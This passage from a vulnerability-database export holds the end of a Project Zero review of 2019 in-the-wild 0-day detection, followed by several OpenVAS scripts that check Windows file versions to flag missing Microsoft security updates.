on the other hand rarely look the same because in their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making it more difficult to detect than standard memory corruption vulns.\n\n** \n**\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\n** \n**\n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days as well as third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. An area for big growth is detecting 0-days on platforms other than Microsoft Windows and what level of access a vendor provides for detection..\n\n** \n**\n\n## Who is doing the detecting? \n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of the Google's TAG is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third less of the 0-days actually used in the wild if it wasn\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. . The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-days exploits that are used in the wild. \n\n** \n**\n\nOut of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n** \n**\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n** \n**\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we\u2019re just not finding them. The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community, rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes, how do we as fellow security professionals incentivize the vendors to prioritize this?\n\n** \n**\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day since we started tracking 0-days targeting Android. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n** \n**\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period: like Linux, Safari, or macOS. While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the amount of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind though that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish based on feedback from you and as our own knowledge and experience continues to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\n** \n**\n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. \n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:28:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471320", "modified": "2019-12-20T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814616", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471320)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471320)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814616\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8611\", \"CVE-2018-8619\",\n \"CVE-2018-8622\", \"CVE-2018-8625\", \"CVE-2018-8626\", \"CVE-2018-8631\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 13:11:27 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471320)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471320\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Windows Domain Name System (DNS) servers when they fail to properly handle\n requests.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, elevate privileges and obtain information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471320\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19208\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19208\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471318", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814619", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814619", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471318)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471318)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814619\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8611\", \"CVE-2018-8619\",\n \"CVE-2018-8621\", \"CVE-2018-8622\", \"CVE-2018-8625\", \"CVE-2018-8631\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 13:11:27 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471318)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471318\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Windows Domain Name System (DNS) servers when they fail to properly handle\n requests.\n\n - Windows Win32k component fails to properly handle objects in\n memory.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to run arbitrary code, elevate privileges and obtain information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471318\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24313\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24313\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530702", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815735", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530702)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815735\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 11:44:25 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530702)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530702\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on\n the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - Win32k component fails to properly handle objects in memory\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Defender improperly handles specific buffers.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to elevate privileges, execute arbitrary code, read unauthorized\n information, bypass secuirty restrictions and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530702\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"inetcomm.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19572\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Inetcomm.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19572\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530681", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815867", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530681)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815867\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1488\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1458\",\n \"CVE-2019-1485\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Pcadm.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18426\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Pcadm.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18426\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530689", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815862", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815862", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530689)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815862\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530689)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530689\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530689\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n 